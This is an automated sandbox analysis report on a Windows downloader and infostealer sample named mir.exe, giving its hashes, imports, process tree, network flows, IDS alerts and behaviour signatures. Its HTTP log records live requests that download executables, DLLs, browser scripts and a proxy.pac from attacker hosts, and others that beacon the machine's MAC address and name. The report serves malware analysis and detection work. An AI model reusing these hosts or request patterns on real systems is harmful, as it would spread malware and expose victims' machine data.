Analysis task

Analysis type VM label Start time End time Duration
File (Windows) win7-sp1-x64-shaapp01-1 2020-04-08 20:44:40 2020-04-08 20:46:46 126 seconds

Maldun score

10.0

Infostealer virus

File details

File name mir.exe
File size 155136 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 8c94cc081cdb526531997c64d1289e99
SHA1 a1e4cf06b9d00b4a4910b4b754f07856432a4e69
SHA256 7efe2742331e3a079427defa5ba50fa93065c5d8697b0c56c5061ba3efa9e590
SHA512 3db91a5a3646131af60db31a43ebaf7e6f8a6fd2c6c81e1de0815801f9655ef1144a11918940b40aabb55d2ccfaa33b5315ce9a8bf6bdbed918640b877c0117f
CRC32 83037713
Ssdeep 3072:Mhb//xQMZDq/qh9B3pU3FsUdS8WOjym6FHXiZRVMYj1Dkg:MZ/xQMZeaf3WeOS873OcMYj1Dkg

Hosts contacted

No host records.

DNS resolution

Domain Rating Response
stat.fei163.com A 114.55.147.224
down.fei163.com Unknown A 47.114.169.177
down.ttwz07.com Unknown A 47.114.164.183
sf.ttwz07.com Unknown
www.baidu.com CNAME www.a.shifen.com
A 180.101.49.11
A 180.101.49.12
m.baidu.com CNAME wap.n.shifen.com
A 180.101.49.19
A 180.101.49.20
dss1.bdstatic.com CNAME sslbaiduv6.jomodns.com
A 180.163.198.33

PE information

Image base 0x00400000
Entry point 0x0040a3b6
Declared checksum 0x00000000
Actual checksum 0x0002aacc
Minimum OS version required 6.0
PDB path D:\DownLoader\DownDll\Release\downloader.pdb
Compile time 2020-03-26 20:19:43
Import hash b46d492553bdb08f6266b5d2cdbf89c4

PE sections

Name Virtual address Virtual size Raw data size Characteristics Entropy
.text 0x00001000 0x0001a8bb 0x0001aa00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.65
.rdata 0x0001c000 0x000077a4 0x00007800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.93
.data 0x00024000 0x00003700 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.07
.rsrc 0x00028000 0x00000288 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.85
.reloc 0x00029000 0x00001860 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 6.41

Resources

Name Offset Size Language Sublanguage Entropy File type
RT_MANIFEST 0x00028060 0x00000224 LANG_ENGLISH SUBLANG_ENGLISH_US 5.04 XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Imports

Library: IPHLPAPI.DLL:
0x41c010 GetAdaptersInfo
Library: imagehlp.dll:
Library: WS2_32.dll:
0x41c184 connect
0x41c188 inet_ntoa
0x41c18c WSAStartup
0x41c190 htons
0x41c194 setsockopt
0x41c198 WSACleanup
0x41c19c recv
0x41c1a0 socket
0x41c1a4 closesocket
0x41c1a8 gethostbyname
0x41c1ac send
Library: ADVAPI32.dll:
0x41c000 OpenProcessToken
Library: KERNEL32.dll:
0x41c01c CreateProcessA
0x41c020 GetExitCodeProcess
0x41c024 WaitForSingleObject
0x41c028 WriteConsoleW
0x41c02c OutputDebugStringW
0x41c030 FlushFileBuffers
0x41c034 CreateFileW
0x41c03c SetEndOfFile
0x41c040 GetStringTypeW
0x41c044 GetComputerNameA
0x41c048 VirtualQuery
0x41c050 WideCharToMultiByte
0x41c054 Sleep
0x41c058 GetModuleFileNameW
0x41c05c MultiByteToWideChar
0x41c060 GetLastError
0x41c068 LoadLibraryA
0x41c06c WinExec
0x41c070 CreateThread
0x41c074 GetCurrentProcess
0x41c078 GetModuleHandleW
0x41c07c OpenProcess
0x41c080 GlobalAlloc
0x41c088 lstrcmpW
0x41c08c GetProcAddress
0x41c090 VirtualAllocEx
0x41c094 GlobalFree
0x41c098 Process32FirstW
0x41c09c Process32NextW
0x41c0a4 CloseHandle
0x41c0a8 GetCurrentProcessId
0x41c0ac GetSystemTime
0x41c0b0 WriteProcessMemory
0x41c0b4 EncodePointer
0x41c0b8 DecodePointer
0x41c0bc ReadFile
0x41c0c4 ExitProcess
0x41c0c8 GetModuleHandleExW
0x41c0cc AreFileApisANSI
0x41c0d0 HeapFree
0x41c0d4 HeapAlloc
0x41c0d8 GetCommandLineA
0x41c0dc RaiseException
0x41c0e0 RtlUnwind
0x41c0e4 IsDebuggerPresent
0x41c0ec DeleteFileW
0x41c0f0 HeapSize
0x41c0fc GetConsoleMode
0x41c100 ReadConsoleW
0x41c104 SetLastError
0x41c108 GetCurrentThreadId
0x41c10c SetFilePointerEx
0x41c110 GetStdHandle
0x41c114 GetFileType
0x41c11c GetStartupInfoW
0x41c12c TerminateProcess
0x41c130 TlsAlloc
0x41c134 TlsGetValue
0x41c138 TlsSetValue
0x41c13c TlsFree
0x41c140 WriteFile
0x41c144 LoadLibraryExW
0x41c148 IsValidCodePage
0x41c14c GetACP
0x41c150 GetOEMCP
0x41c154 GetCPInfo
0x41c158 GetConsoleCP
0x41c15c GetProcessHeap
0x41c160 GetModuleFileNameA
0x41c170 HeapReAlloc
0x41c174 SetStdHandle
0x41c178 CompareStringW
0x41c17c LCMapStringW

No antivirus engine scan information!

Process tree


mir.exe, PID: 2692, parent PID: 2320
cmd.exe, PID: 2860, parent PID: 2692
sesvc.exe, PID: 2452, parent PID: 2692
svchost.exe, PID: 2912, parent PID: 2692
svchost.exe, PID: 2676, parent PID: 2912
svchost.exe, PID: 2812, parent PID: 2912

TCP

Source address Source port Destination address Destination port
192.168.122.201 49161 114.55.147.224 stat.fei163.com 680
192.168.122.201 49176 114.55.147.224 stat.fei163.com 680
192.168.122.201 49201 114.55.147.224 stat.fei163.com 680
192.168.122.201 49204 114.55.147.224 stat.fei163.com 680
192.168.122.201 49211 114.55.147.224 stat.fei163.com 680
192.168.122.201 49220 114.55.147.224 stat.fei163.com 680
192.168.122.201 49221 114.55.147.224 stat.fei163.com 680
192.168.122.201 49203 173.208.160.45 88
192.168.122.201 49219 173.208.160.45 666
192.168.122.201 49222 180.101.49.11 www.baidu.com 443
192.168.122.201 49223 180.101.49.11 www.baidu.com 443
192.168.122.201 49224 180.101.49.11 www.baidu.com 443
192.168.122.201 49225 180.101.49.11 www.baidu.com 443
192.168.122.201 49173 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49175 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49177 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49178 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49179 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49180 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49181 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49182 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49183 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49184 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49185 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49186 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49187 47.114.164.183 down.ttwz07.com 88
192.168.122.201 49188 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49189 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49190 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49191 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49192 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49193 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49194 47.114.164.183 down.ttwz07.com 447
192.168.122.201 49162 47.114.169.177 down.fei163.com 88
192.168.122.201 49163 47.114.169.177 down.fei163.com 88
192.168.122.201 49164 47.114.169.177 down.fei163.com 88
192.168.122.201 49165 47.114.169.177 down.fei163.com 88
192.168.122.201 49166 47.114.169.177 down.fei163.com 88
192.168.122.201 49167 47.114.169.177 down.fei163.com 88
192.168.122.201 49168 47.114.169.177 down.fei163.com 88
192.168.122.201 49171 47.114.169.177 down.fei163.com 88
192.168.122.201 49172 47.114.169.177 down.fei163.com 88
192.168.122.201 49200 63.141.246.178 80
192.168.122.201 49202 63.141.246.178 80

UDP

Source address Source port Destination address Destination port
192.168.122.201 49157 192.168.122.1 53
192.168.122.201 50112 192.168.122.1 53
192.168.122.201 51384 192.168.122.1 53
192.168.122.201 51466 192.168.122.1 53
192.168.122.201 51896 192.168.122.1 53
192.168.122.201 58646 192.168.122.1 53
192.168.122.201 59968 192.168.122.1 53
192.168.122.201 62882 192.168.122.1 53
192.168.122.201 63974 192.168.122.1 53

HTTP requests

URI HTTP data
URI: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0
GET http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=TEST-PC&product_id=0 HTTP/1.1
HOST: stat.fei163.com
Connection: Close

URI: http://down.fei163.com:88/downservers.aspx?ShopId=101308
GET http://down.fei163.com:88/downservers.aspx?ShopId=101308 HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308
GET http://down.fei163.com:88/GetProDownConfig.aspx?ShopId=101308 HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://down.fei163.com:88/proxy/101308/51/config.txt
GET http://down.fei163.com:88/proxy/101308/51/config.txt HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll
GET http://down.fei163.com:88/proxy/101308/51/ExtensionDll.dll HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://down.fei163.com:88/proxy/101308/51/SuoLock.exe
GET http://down.fei163.com:88/proxy/101308/51/SuoLock.exe HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://down.fei163.com:88/proxy/101308/52/x86.dll
GET http://down.fei163.com:88/proxy/101308/52/x86.dll HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://down.fei163.com:88/proxy/101072/88/svchnots.exe
GET http://down.fei163.com:88/proxy/101072/88/svchnots.exe HTTP/1.1
HOST: down.fei163.com
Connection: Close

URI: http://47.114.164.183:88/zs.der
GET http://47.114.164.183:88/zs.der HTTP/1.1
HOST: 47.114.164.183
Connection: Close

URI: http://47.114.164.183:88/proxy.pac
GET /proxy.pac HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0)
Host: 47.114.164.183:88

URI: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51
GET http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51 HTTP/1.1
HOST: stat.fei163.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/360/content-script.js
GET http://down.ttwz07.com:88/cq/101308/360/content-script.js HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js
GET http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/google/content-script.js
GET http://down.ttwz07.com:88/cq/101308/google/content-script.js HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/360/manifest.txt
GET http://down.ttwz07.com:88/cq/101308/360/manifest.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/360/Preferences.txt
GET http://down.ttwz07.com:88/cq/101308/360/Preferences.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/google/manifest.txt
GET http://down.ttwz07.com:88/cq/101308/google/manifest.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/google/Preferences.txt
GET http://down.ttwz07.com:88/cq/101308/google/Preferences.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/path360.txt
GET http://sf.ttwz07.com:447/path360.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt
GET http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt
GET http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt
GET http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt HTTP/1.1
HOST: down.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://sf.ttwz07.com:447/SiFuUrlList/rand.txt
GET http://sf.ttwz07.com:447/SiFuUrlList/rand.txt HTTP/1.1
HOST: sf.ttwz07.com
Connection: Close

URI: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
GET /api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: stat.fei163.com:680

URI: http://63.141.246.178/101298/Ver.txt
POST /101298/Ver.txt HTTP/1.1
Accept: */*
Referer: http://63.141.246.178/101298/Ver.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178
Content-Length: 0
Cache-Control: no-cache

URI: http://63.141.246.178/101298/Good.jpg
GET /101298/Good.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://63.141.246.178/101298/Good.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178

URI: http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0
GET /tongji.php?userid=101298&mac=52:54:00:64:DC:C0 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 173.208.160.45:88

URI: http://63.141.246.178/101298/better.jpg
GET /101298/better.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://63.141.246.178/101298/better.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178

URI: http://63.141.246.178/101298/best.jpg
GET /101298/best.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://63.141.246.178/101298/best.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 63.141.246.178

URI: http://173.208.160.45:666/Ver.php
POST /Ver.php HTTP/1.1
Accept: */*
Referer: http://173.208.160.45:666/Ver.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 173.208.160.45:666
Content-Length: 0
Cache-Control: no-cache

URI: http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
GET /api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: stat.fei163.com:680

SMTP traffic

No SMTP traffic.

IRC traffic

No IRC requests.

ICMP traffic

No ICMP traffic.

CIF report

No CIF results

Network alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2020-04-08 20:45:08.555961+0800 47.114.169.177 88 192.168.122.201 49167 TCP 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
2020-04-08 20:45:09.131802+0800 47.114.169.177 88 192.168.122.201 49168 TCP 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
2020-04-08 20:45:09.594622+0800 47.114.169.177 88 192.168.122.201 49171 TCP 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
2020-04-08 20:45:11.124597+0800 47.114.169.177 88 192.168.122.201 49172 TCP 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
2020-04-08 20:45:25.492074+0800 63.141.246.178 80 192.168.122.201 49202 TCP 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
2020-04-08 20:46:19.297784+0800 47.114.164.183 88 192.168.122.201 49175 TCP 2014435 ET TROJAN Infostealer.Banprox Proxy.pac Download A Network Trojan was detected

TLS

Timestamp Source IP Source Port Destination IP Destination Port Version Issuer Subject Fingerprint
2020-04-08 20:45:59.407872+0800 192.168.122.201 49222 180.101.49.11 443 TLS 1.2 C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=CN, ST=beijing, L=beijing, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co., Ltd, CN=baidu.com d1:f6:32:3d:b6:f2:ec:81:e7:02:36:90:f4:9b:2d:91:e0:c3:99:3a

Suricata HTTP

No Suricata HTTP

No network-extracted files found
Sorry! No files were dropped.
No similar analyses found.

Processing ( 28.922 seconds )

  • 12.714 NetworkAnalysis
  • 9.734 Suricata
  • 3.031 VirusTotal
  • 2.461 BehaviorAnalysis
  • 0.427 Static
  • 0.287 TargetInfo
  • 0.234 peid
  • 0.019 AnalysisInfo
  • 0.014 Strings
  • 0.001 Memory

Signatures ( 3.168 seconds )

  • 1.806 md_url_bl
  • 0.134 api_spamming
  • 0.112 stealth_timeout
  • 0.107 antiav_detectreg
  • 0.092 stealth_decoy_document
  • 0.054 infostealer_ftp
  • 0.05 antiav_detectfile
  • 0.046 mimics_filetime
  • 0.039 reads_self
  • 0.037 md_domain_bl
  • 0.035 infostealer_bitcoin
  • 0.033 antidbg_windows
  • 0.033 infostealer_im
  • 0.032 stealth_file
  • 0.032 maldun_anomaly_massive_file_ops
  • 0.028 bootkit
  • 0.026 virus
  • 0.023 antivm_generic_disk
  • 0.022 antianalysis_detectreg
  • 0.02 antivm_vbox_files
  • 0.019 infostealer_mail
  • 0.016 infostealer_browser
  • 0.014 infostealer_browser_password
  • 0.012 antivm_generic_scsi
  • 0.012 hancitor_behavior
  • 0.011 kovter_behavior
  • 0.011 rat_pcclient
  • 0.01 antiemu_wine_func
  • 0.009 injection_createremotethread
  • 0.009 antisandbox_sleep
  • 0.009 antidbg_devices
  • 0.009 geodo_banking_trojan
  • 0.008 maldun_malicious_write_executeable_under_temp_to_regrun
  • 0.008 packer_themida
  • 0.008 antivm_generic_services
  • 0.008 antivm_vbox_window
  • 0.008 betabot_behavior
  • 0.008 kibex_behavior
  • 0.008 anormaly_invoke_kills
  • 0.007 maldun_anomaly_write_exe_and_obsfucate_extension
  • 0.007 process_interest
  • 0.006 network_tor
  • 0.006 ipc_namedpipe
  • 0.006 antisandbox_script_timer
  • 0.006 ransomware_extensions
  • 0.005 hawkeye_behavior
  • 0.005 dridex_behavior
  • 0.005 rat_luminosity
  • 0.005 browser_needed
  • 0.005 stealth_network
  • 0.005 kazybot_behavior
  • 0.005 anomaly_persistence_autorun
  • 0.005 shifu_behavior
  • 0.005 maldun_anomaly_write_exe_and_dll_under_winroot_run
  • 0.005 vawtrak_behavior
  • 0.005 antivm_parallels_keys
  • 0.005 antivm_xen_keys
  • 0.005 darkcomet_regkeys
  • 0.005 network_http
  • 0.005 ransomware_files
  • 0.004 antivm_vbox_libs
  • 0.004 injection_explorer
  • 0.004 codelux_behavior
  • 0.003 sets_autoconfig_url
  • 0.003 injection_runpe
  • 0.003 process_needed
  • 0.003 securityxploded_modules
  • 0.003 antivm_generic_diskreg
  • 0.003 antivm_vmware_files
  • 0.003 recon_fingerprint
  • 0.002 tinba_behavior
  • 0.002 virtualcheck_js
  • 0.002 ransomware_message
  • 0.002 heapspray_js
  • 0.002 antisandbox_sunbelt_libs
  • 0.002 exec_crash
  • 0.002 dead_connect
  • 0.002 cerber_behavior
  • 0.002 sniffer_winpcap
  • 0.002 antisandbox_productid
  • 0.002 antivm_hyperv_keys
  • 0.002 antivm_vbox_keys
  • 0.002 antivm_vmware_keys
  • 0.002 antivm_vpc_files
  • 0.002 disables_browser_warn
  • 0.002 malicous_targeted_flame
  • 0.002 network_torgateway
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 disables_spdy
  • 0.001 office_dl_write_exe
  • 0.001 network_anomaly
  • 0.001 antivm_vmware_libs
  • 0.001 kelihos_behavior
  • 0.001 antisandbox_sboxie_libs
  • 0.001 antiav_bitdefender_libs
  • 0.001 disables_wfp
  • 0.001 bypass_firewall
  • 0.001 antianalysis_detectfile
  • 0.001 antisandbox_sunbelt_files
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 antivm_xen_keys
  • 0.001 antivm_vbox_acpi
  • 0.001 antivm_vpc_keys
  • 0.001 banker_cridex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.001 maldun_anomaly_invoke_vb_vba
  • 0.001 network_cnc_http
  • 0.001 network_tor_service
  • 0.001 packer_armadillo_regkey
  • 0.001 recon_programs

Reporting ( 0.775 seconds )

  • 0.71 ReportHTMLSummary
  • 0.065 Malheur
Task ID 535187
Mongo ID 5e8dc7f1bb7d5727dd78b824
Cuckoo release 1.4-Maldun